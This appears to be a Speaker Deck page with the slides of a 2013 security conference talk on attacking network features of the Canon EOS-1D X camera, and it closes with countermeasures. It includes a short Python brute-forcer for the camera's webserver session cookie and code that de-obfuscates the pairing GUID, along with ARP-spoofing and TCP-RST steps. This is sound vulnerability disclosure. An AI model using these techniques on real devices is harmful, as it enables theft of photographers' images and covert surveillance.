Upgrade to Pro — share decks privately, control downloads, hide ads and more …

[HES2013] Paparazzi over ip by Daniel Mende

HackitoErgoSum
May 03, 2013
Research
0
55

[HES2013] Paparazzi over ip by Daniel Mende

Almost every recent higher class DSLR camera features multiple and complex access technologies. For example, CANON’s new flagship features IP connectivity both wired via 802.3 and wireless via 802.11. All big vendors are pushing these features to the market and advertise them as realtime image transfer to the cloud. We have taken a look at the layer 2 and 3 implementations in the CamOS and the services running upon those. Not only did we discover weak plaintext protocols used in the communication, we’ve also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the “upload to the clouds” feature resulted in an image stealing Man-in-the-Imageflow. We will present the results of our research on cutting edge cameras, exploit the weaknesses in a live demo and release a tool after the presentation.

Audio available here : http://2013.hackitoergosum.org/presentations/Day2-03.Paparazzi%20over%20IP%20by%20Daniel%20Mende.mp3
More information about the conference :
https://www.hackitoergosum.org

HackitoErgoSum

May 03, 2013
Tweet

More Decks by HackitoErgoSum

See All by HackitoErgoSum
[HES2014] Vaccinating APK’s by Milan Gabor & Danijel Grah
hackitoergosum
0
180
[HES2014] WMI Shell: A new way to get shells on remote Windows machines using only the WMI service by Andrei Dumitrescu
hackitoergosum
2
4.7k
[HES2014] LTE vs. Darwin: The Evolution Strikes Back? by Hendrik Schmidt & Brian Butterly
hackitoergosum
0
94
[HES2014] Applying science to eliminate 100% of buffer overflows by Andreas Bogk
hackitoergosum
0
260
[HES2013] Hacking apple accessories to pown iDevices – Wake up Neo! Your phone got pwnd ! by Mathieu ‘GoToHack’ RENARD
hackitoergosum
1
160
[HES2013] Frida IRE – a tool for scriptable dynamic instrumentation in userland by Ole André Vadla Ravnås
hackitoergosum
0
230
[HES2014] HackRF A Low Cost Software Defined Radio Platform by Benjamin Vernoux
hackitoergosum
0
240
[HES2013] Information Warfare: mistakes from the MoDs by Raoul “Nobody” Chiesa
hackitoergosum
0
96
[HES2013] The reality about Red October by Paul “RootBSD” Rascagneres
hackitoergosum
0
83

Other Decks in Research

See All in Research
note #買ってよかったものレポート2022 / Best to Buy 2022
noteinc
1
830
LaCAM: Search-Based Algorithm for Quick Multi-Agent Pathfinding
kei18
0
190
サイボウズのUXリサーチャーについて
cybozuinsideout
PRO
0
550
画面転送式デジタルサイネージの開発に向けたVNCトラフィックの計測 / IOTS2022-akiba
yumulab
0
160
『組織として』顧客を理解するインタビュー習慣の作り方 #pmconf2022 / Continuous user interview habit
tktktks10
4
6.3k
ログ収集入門Elastic_Searchの機能と活用事例
o_hasegawa
0
220
Federated Learning Tutorial (IBIS 2022)
osx
2
2.4k
2023 東工大 情報通信系 研究室紹介 (大岡山) / [email protected], Tokyo Tech (Ookayama Campus) 2023
icttitech
0
1.9k
[CFML勉強会#7] EconMLに実装されている異質処置効果の推定手法の紹介・再考
fullflu
0
520
SummerCake_pdf.pdf
lyh125
0
350
プルサーマル202211アップ用.pdf
hide2kano
0
320
AutoML チュートリアル(HPOとNAS)
sgnm
8
1.2k

Featured

See All Featured
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.4k
A Modern Web Designer's Workflow
chriscoyier
689
180k
Into the Great Unknown - MozCon
thekraken
4
380
The Power of CSS Pseudo Elements
geoffreycrofte
53
4.4k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
32
7.2k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
121
29k
How To Stay Up To Date on Web Technology
chriscoyier
779
250k
Designing on Purpose - Digital PM Summit 2013
jponch
108
5.9k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
236
1.1M
The Web Native Designer (August 2011)
paulrobertlloyd
77
2.3k
Intergalactic Javascript Robots from Outer Space
tanoku
261
26k
Writing Fast Ruby
sferik
613
58k

Transcript

  1. www.ernw.de
    Paparazzi over IP
    Daniel Mende
    [email protected]

    View Slide

  2. www.ernw.de
    Who we are
    ¬ Old-school network geeks,
    working as security researchers for
    Germany based ERNW GmbH
     Independent
     Deep technical knowledge
     Structured (assessment) approach
     Business reasonable recommendations
     We understand corporate
    ¬ Blog: www.insinuator.net
    ¬ Conference: www.troopers.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2

    View Slide

  3. www.ernw.de
    Agenda
    ¬ Intro
    ¬ Transport Protocols
    ¬ Communication Modes & Attacks
    ¬ Conclusions
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #3

    View Slide

  4. www.ernw.de
    Intro
    ¬ A number of current high-end
    cameras have network interfaces.
    ¬ We did some research as for their
    security and potential attack paths.
    ¬ In the following we focus on Canons
    new flagship EOS 1D X, but similar
    problems might be found in other
    models, of other vendors, too.
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #4

    View Slide

  5. www.ernw.de
    The Camera
    Canon EOS-1D X
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #5

    View Slide

  6. www.ernw.de
    The Camera
    ¬ From Canon USA:
     A built in Ethernet port allows for fast,
    easy transfer of images directly to a
    PC or via a network to clients from live
    events.
     The EOS-1D X is compatible with the
    new WFT-E6A Wireless File
    Transmitter for wireless LAN transfer
    with the IEEE 802.11 a/b/g/n
    standards.
    A Bit of Marketing
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #6

    View Slide

  7. www.ernw.de
    The Camera
    The Ethernet Port
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #7

    View Slide

  8. www.ernw.de
    The Camera
    WLAN Adapter
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #8

    View Slide

  9. www.ernw.de
    The Target
    aka. Mr. Reuters
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #9

    View Slide

  10. www.ernw.de
    The Target
    ¬ One could get the real, unedited
    images first.
    ¬ One could upload (bad) images.
    ¬ One could turn the camera into a
    surveillance device.
    What if
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #10

    View Slide

  11. www.ernw.de
    Transport
    The underlying Protocols

    View Slide

  12. www.ernw.de
    Transport
    ¬ Wired LAN via built-in Ethernet
    port or Wireless LAN via WFT-E6A.
    ¬ Standard TCP/IP (no IPv6, yet).
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #12

    View Slide

  13. www.ernw.de
    Traditional Attacks
    ¬ ARP-spoofing possible.
     No “sticky” ARP entries
    ¬ ARP-flooding with ~100 packets
    per second DoS the network stack.
    ¬ Btw. stack also dies if IPv6
    (multicast) is present.
    Layer 2
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #13

    View Slide

  14. www.ernw.de
    Traditional Attacks
    ¬ TCP/IP is used for all network
    communication.
    ¬ Established connections can be
    killed via TCP-RST.
    Layer 3/4
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #14

    View Slide

  15. www.ernw.de
    Communication Modes

    View Slide

  16. www.ernw.de
    Communication Modes
    ¬ FTP Upload Mode
    ¬ DLNA
    ¬ Built-in webserver
    ¬ EOS Utility
    Overview
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #16

    View Slide

  17. www.ernw.de
    FTP Upload Mode

    View Slide

  18. www.ernw.de
    FTP Upload Mode
    ¬ Target server and credentials
    configured on camera.
    ¬ Photos taken are uploaded to the
    server immediately.
    Mode of operation
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #18

    View Slide

  19. www.ernw.de
    FTP Upload Mode
    ¬ As FTP is clear text, credentials
    can be sniffed.
    ¬ As well as the complete data
    transmission
    ¬ Uploaded pictures can be extracted
    from network traffic.
    Downside
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #19

    View Slide

  20. www.ernw.de
    FTP Upload Mode
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #20

    View Slide

  21. www.ernw.de
    FTP Upload Mode
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #21

    View Slide

  22. www.ernw.de
    DLNA mode

    View Slide

  23. www.ernw.de
    DLNA mode
    ¬ Digital Living Network Alliance®
    ¬ UPnP used for discovery.
    ¬ DLNA guidelines for file formats,
    encodings, resolutions.
    ¬ HTTP and XML used to access
    media.
    Overview
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #23

    View Slide

  24. www.ernw.de
    DLNA mode
    ¬ No authentication.
    ¬ No restrictions.
    ¬ Every DLNA client can download _all_
    images.
    ¬ Your Browser could be a DLNA client.
    Or somebody else's browser. For your
    camera.
    Cons
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #24

    View Slide

  25. www.ernw.de
    Built-in webserver
    Always a good idea…

    View Slide

  26. www.ernw.de
    Built-in webserver
    ¬ Wireless File Transmitter Server
    Mode.
    ¬ Canon USA:
    “Use a web browser to capture,
    view and download images
    remotely”
    Canon WFT Server
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #26

    View Slide

  27. www.ernw.de
    Built-in webserver
    ¬ Browser interface uses AJAX.
    ¬ Embedded webserver only capable
    of HTTP GET method.
     Every other request method is
    answered with a 404.
    Canon WFT Server
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #27

    View Slide

  28. www.ernw.de
    Built-in webserver
    ¬ Authentication via HTTP Basic
    (RFC 2617) on login page.
    ¬ Session cookie is used afterwards.
    ¬ Cookie looks like sessionID=40b1
     4 (!!!) byte Session ID
     65535 possible IDs
    Authentication
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #28

    View Slide

  29. www.ernw.de
    Built-in webserver
    ¬ Session ID Brute force
    implemented in 6 lines of python.
    ¬ To check for all possible IDs takes
    about 20 minutes.
     Embedded Webserver is not that
    responsive.
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #29

    View Slide

  30. www.ernw.de
    import requests
    target_uri = 'http://192.168.1.103/api/cam/lvoutput'
    target_string = 'SESSION_ERR'
    for i in xrange(0xffff):
    if (i != 0 and i%1000 == 0):
    print str(i) + 'IDs checked'
    r = requests.get(target_uri, cookies={'sessionID': '%x' %i})
    if r.text.find(target_string) == -1:
    print 'SessionID is : sessionID=%x' %i
    break
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #30

    View Slide

  31. www.ernw.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #31

    View Slide

  32. www.ernw.de
    Built-in webserver
    ¬ Full access to Live View, stored
    photos and camera settings.
    ¬ You surf – We brute.
    recap
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #32

    View Slide

  33. www.ernw.de
    Built-in webserver
    ¬ Camera in WFT Server mode.
    ¬ Valid session opened by user.
    ¬ Some minutes of time.
    Requirements
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #33

    View Slide

  34. www.ernw.de
    EOS Utility mode
    aka. I wanna be root

    View Slide

  35. www.ernw.de
    EOS Utility mode
    The Utility
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #35

    View Slide

  36. www.ernw.de
    EOS Utility mode
    The Utility
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #36

    View Slide

  37. www.ernw.de
    EOS Utility mode
    ¬ Allows remote control of all non-
    manual camera functions.
    ¬ Pictures can be up- and
    downloaded.
    ¬ Possibly even more (sound
    recording anyone?)
    Overview
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #37

    View Slide

  38. www.ernw.de
    EOS Utility mode
    ¬ SSDP and MDNS used for
    discovery.
    ¬ PTP/IP used for communication.
    ¬ Needs initial camera software
    pairing.
    Technical
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #38

    View Slide

  39. www.ernw.de
    EOS Utility mode
    ¬ At first use, credentials needs to be
    exchanged between the camera
    and the client software.
    ¬ Camera must be put into pairing
    mode via camera menu.
    ¬ Camera signals the need for
    pairing via MDNS.
    Pairing
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #39

    View Slide

  40. www.ernw.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #40

    View Slide

  41. www.ernw.de
    EOS Utility mode
    Pairing
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #41

    View Slide

  42. www.ernw.de
    EOS Utility mode
    ¬ Client software connects to camera
    via PTP/IP.
    ¬ PTP/IP Authentication is
    successful regardless of the
    credentials.
    ¬ Credentials (hostname, GUID) are
    stored on the camera.
    Pairing
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #42

    View Slide

  43. www.ernw.de
    PTP/IP
    Feels like USBoIP )-:

    View Slide

  44. www.ernw.de
    PTP/IP
    ¬ Picture Transfer Protocol over
    Internet Protocol.
    ¬ ISO 15740.
    ¬ Standardized by International
    Imaging Industry Association
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #44

    View Slide

  45. www.ernw.de
    PTP/IP
    ¬ Wrapper for PTP with header:
    4 byte length (little endian)
    4 byte type (little endian)
    data
    Packet format
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #45

    View Slide

  46. www.ernw.de
    PTP/IP
    Layering
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #46

    View Slide

  47. www.ernw.de
    PTP/IP
    ¬ PTPIP_INIT_COMMAND_REQUEST
     Includes authentication data:
    16 byte GUID
    hostname string
    Authentication
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #47

    View Slide

  48. www.ernw.de
    PTPIP_INIT_COMMAND_REQUEST
    2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e
    a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00
    65 00 72 00 00 00 00 00 01 00
    Paket length = 42 byte
    Paket type = 0x01 = PTPIP_INIT_COMMAND_REQUEST
    GUID
    Hostname = “server” @ utf16
    Trailer
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #48

    View Slide

  49. www.ernw.de
    PTP

    View Slide

  50. www.ernw.de
    PTP
    ¬ Picture Transfer Protocol
    ¬ Standardized by International
    Imaging Industry Association
    ¬ ISO 15740
    ¬ Lots of proprietary vendor
    extensions.
    Explained
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #50

    View Slide

  51. www.ernw.de
    PTP
    ¬ Designed for use over USB
    ¬ Fixed length
    ¬ 2 byte Msg Code
    ¬ 4 byte Session ID
    ¬ 4 byte Transaction ID
    ¬ 5 times 4 byte Parameter or Data
    Packet format
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #51

    View Slide

  52. www.ernw.de
    PTP
    ¬ Lot of standardized codes like:
     PTP_GetDeviceInfo
     PTP_OpenSession
     PTP_CloseSession
     PTP_GetStorageIDs
    ¬ Also Vendor specific codes like:
     PTP_CANON_GetCustomizeSpec
     PTP_CANON_GetCustomizeItemInfo
    Message Codes
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #52

    View Slide

  53. www.ernw.de
    PTP
    ¬ Thankfully there are some
    implementations around.
    ¬ We decided to go with libgphoto2.
    ¬ Basic PTP/IP support is included
    as well.
    Use of
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #53

    View Slide

  54. www.ernw.de
    The Attack
    aka. gottcha

    View Slide

  55. www.ernw.de
    Attack
    ¬ Client Hostname easy
    discoverable, but not needed.
     Camera also excepts connections with
    a different hostname.
    ¬ GUID unknown to client software.
    ¬ Obfuscated GUID is broadcasted by
    the cam via UPNP.
    Getting the Credentials
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #55

    View Slide

  56. www.ernw.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #56

    View Slide

  57. www.ernw.de
    tmp = mdns_info.getProperties()['tid.canon.com'].split('-')
    guid = []
    l = lambda s: [ s[i:i+2:] for i in xrange(0,len(s),2) ][::-1]
    for i in xrange(0,3):
    guid += l(tmp[i])
    guid += tmp[3]
    guid += tmp[4]
    guid = "".join(guid)
    guid = eb7a789d69cb644ea3e0fc96ef597942
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #57

    View Slide

  58. www.ernw.de
    The Attack
    ¬ Camera only allows one
    connection.
    ¬ Already connected client needs to
    be disconnected.
    ¬ TCP-RST the established PTP/IP
    connection.
    Connecting to the Camera
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #58

    View Slide

  59. www.ernw.de
    Attack
    ¬ Listen for the Cam on MDNS.
    ¬ De-obfuscate Authentication data.
    ¬ Disconnect connected Client
    Software.
    ¬ Connect via PTP/IP.
    ¬ Have Phun (-;
    Process
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #59

    View Slide

  60. www.ernw.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #60

    View Slide

  61. www.ernw.de
    Attack outlined
    ¬ Photograph uses hotel / Starbucks
    WLAN, which isn’t unlikely during
    events (think of Grammy Awards
    few days ago).
    ¬ Almost anybody in the same LAN
    can download the images from the
    camera (and even more).
    So you can write it down
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #61

    View Slide

  62. www.ernw.de
    Countermeasures
    ¬ Enable network functionality only
    in trusted Networks.
    ¬ Use WPA and a secure passphrase
    for (your trusted) WLAN.
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #62

    View Slide

  63. www.ernw.de
    Conclusions
    ¬ High-end cameras are yet another daily
    life item equipped with networking
    capabilities incl. full-blown IP stacks.
    ¬ Once more, their device-specific network
    technologies have been designed and
    implemented without (too much) security
    in mind.
    ¬ Again, this leads to (classes of) attacks
    previously unknown to their non-
    networked counterparts.
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #63

    View Slide

  64. www.ernw.de
    Next Steps
    New series of DSLRs (EOS 6D)
     Built-in Wireless Access Point
     New communication protocol for
    IOS/Android App
    New series of camcorder(XA20, XA25)
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #64

    View Slide

  65. www.ernw.de
    There’s never enough time…
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #65
    THANK YOU… ...for yours!

    View Slide

  66. www.ernw.de
    Questions?
    © ERNW GmbH
    | Breslauer Str.
    28 | D-69124 66

    View Slide